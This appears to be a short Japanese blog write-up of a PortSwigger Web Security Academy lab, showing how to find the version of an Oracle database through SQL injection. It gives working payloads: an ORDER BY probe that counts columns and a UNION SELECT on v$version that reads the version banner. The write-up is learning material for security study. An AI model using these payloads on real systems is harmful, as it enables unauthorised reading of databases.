はじめに

ウェブセキュリティの勉強のために、PortSwigger Web Security Academyを地道に進めていこうと思います。

今日は「SQL injection attack, querying the database type and version on Oracle」というラボのWriteupです。

portswigger.net

Summary

• Oracleのコメントは -- 。
• Oracleでバージョンを表示するには SELECT * FROM v$version 。

Writeup

列の数を確認。3でエラーが出たので、SELECTの引数は2つ必要。

category=' ORDER BY 3 --

列数の帳尻を合わせるために、 SELECT の引数に 'a' を足して実行。

category=' UNION SELECT banner, 'a' FROM v$version --

参考

https://portswigger.net/web-security/sql-injection/cheat-sheet